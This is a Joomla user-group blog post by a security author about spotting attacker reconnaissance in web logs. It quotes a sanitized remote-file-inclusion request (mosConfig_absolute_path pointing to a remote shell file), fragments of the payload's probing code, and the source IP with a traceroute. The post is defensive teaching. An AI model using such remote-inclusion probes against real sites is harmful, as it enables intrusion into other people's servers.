Joomla Chicago CMS Group

Hi there,

Tom Canavan here, Mike asked me to share a few thoughts on security. He mentioned that in your meeting today security was a bit of interest.

I'm currently writing a book, Practical Joomla! security, so you guys get to be privy to a bit of advanced knowledge! This posting is to show you how to observe, being observed. In other words, how an attacker is sizing you up.

Why did I start this post out with "What's your cool hacker name?"; I chose that title to open the topic of reviewing your log files for potential attack, because the underground community (as we do in the overground) like to have online handles. Yet, having a cool name in the underground can earn you 'cred' when you "owndz" a box. Slang for penetrate, take over and make it yours.

I thought that I would share with you an example of an attempted enumeration/penetration.

Let's pull one out here from one of my websites - An actual example (sanitized of course).

This is very recent information. Let's begin by logging in and reviewing our logs. For this I use BS Squared. A wonderful extension that tracks several items about my visitors.

First thing I see is this:


//?mosConfig_absolute_path=http://web.*******.at/xxxxxxx/yyyyy//administrator/components/com_chronocontact/excelwriter/test.txt???

What this tells me is that the site web.*******.at (somewhere in South America) has been 'penetrated'.

This means that under the com_chronocontact; component directory, someone has planted a shell and is controlling this site. I see that by the test.txt??? at the end.

The TEST.TXT??? is the payload of the attack. That is what the lamer is attempted to use on my site.

What in essence they are trying to do is use this remote 'command' to 'order' my site to divulge information.

We'll cover the specifics in a moment. My next item of interest is "where" is this would be lamer be hailing from. I look up the IP and find: IP Address: 201.34.32.66

Hostname: 201-34-32-66.pvoce301.ipd.brasiltelecom.net.br

Easy - Brazil Telecom. Doing a tracert on the IP would only validate the fact the attack originated from Brazil, but would likely not lead me further.

But to be sure I open a cmd prompt (Dos prompt for those over 40) and do a tracert: Here are the results:

Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.

tracert 201.34.32.66

Tracing route to 201-34-32-66.pvoce301.ipd.brasiltelecom.net.br [201.34.32.66] over a maximum of 30 hops:

This confirms it. Brazil. As we dig into the code we find these portions:

if((@eregi("uid",ex(id)) || (@eregi(Windows;,ex(net start; and ini_restore(“safe_mode”; ini_restore(“open_basedir”; )

These portions tell me that the attacker is attempting to do a 'net start' on my Windows box.

Pity I am running Linux.

Further as we see in that code, he attempts to manipulate some settings. In a nutshell he is trying to learn what my site is running to plan an attack.

How can we defend against this? Defense In Depth - making sure we have the correct permissions, strong .htaccess settings and stay on top of security.

Reading hacker forums such as milw0rm.com for potential attacks and guarding against them. In this we were in no way threatened, only annoyed. So what’s my cool hacker name? - You'll have to visit the hacker forums and find out!

Be afraid. Be very afraid.

I don't have a hacker name, but I was known as "Little Arrow" in Indian Guides in 1973, and "Green Arrow" on the CB Radio whilst criss-crossing the nation in our 1972 Buick Estate Wagon - much like the Family Truckster made famous by Chevy Chase in Family Vacation.